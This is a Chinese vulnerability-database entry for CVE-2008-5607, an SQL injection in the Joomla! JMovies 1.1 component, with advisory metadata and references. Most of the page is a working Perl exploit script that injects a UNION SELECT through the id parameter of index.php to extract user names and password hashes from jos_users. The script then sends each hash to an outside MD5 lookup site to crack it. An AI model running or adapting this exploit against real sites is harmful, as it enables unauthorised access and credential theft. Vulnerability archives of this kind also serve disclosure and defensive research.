Joomla! Jmovies 组件index.php SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116924 漏洞类型 SQL注入
发布时间 2008-12-03 更新时间 2009-01-29
CVE编号 CVE-2008-5607 CNNVD-ID CNNVD-200812-292
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7331
https://cxsecurity.com/issue/WLB-2008120153
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-292
|漏洞详情
Joomla!是一套在国外相当知名的内容管理系统(ContentManagementSystem,CMS)。Joomla!JMovies(又称JMorcom_jmovies)组件1.1版本中存在SQL注入漏洞。远程攻击者可以借助对index.php的id参数,执行任意SQL指令。
|漏洞EXP
#!/usr/bin/perl -w
# -----------------------------------------------------------
# Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit
# by s3rg3770 with athos :)
# demo http://www.disneyrama.com
# -----------------------------------------------------------
# Note: In lulz we trust :O
# -----------------------------------------------------------

use strict;
use LWP::UserAgent;
use LWP::Simple;


my $host = shift;
my $myid = shift or &help;

my $path = "/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+".
           "union+select+1,concat(0x215F,username,0x3a,password,0x215F)+".
           "from+jos_users+where+id=${myid}--";

my $http = new LWP::UserAgent(
                               agent   => 'Mozilla/4.5 [en] (Win95; U)',
                               timeout => '5',
                             );  


my $response = $http->get($host.$path); 

if($response->content =~ /!_(.+?)!_/i)
{
     print STDOUT "Hash MD5: $1\n";
     print STDOUT "Password: ".search_md5($1)."\n";
     exit;
}
else
{
     print STDOUT "Exploit Failed!\n";
     exit;
}



sub search_md5
{
     my $hash = shift @_;
     my $cont = undef;

     $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
        
     if(length($hash) < 32 && !is_error($cont))
     {
          return $cont;
     }
}   


sub help
{
     print STDOUT "Usage: perl $0 [host] [user ID]\n";
     print STDOUT "by athos - staker[at]hotmail[dot]it\n";
     exit;
}

# milw0rm.com [2008-12-03]
|参考资料

来源:BID
名称:32615
链接:http://www.securityfocus.com/bid/32615
来源:MILW0RM
名称:7331
链接:http://www.milw0rm.com/exploits/7331
来源:SREASON
名称:4759
链接:http://securityreason.com/securityalert/4759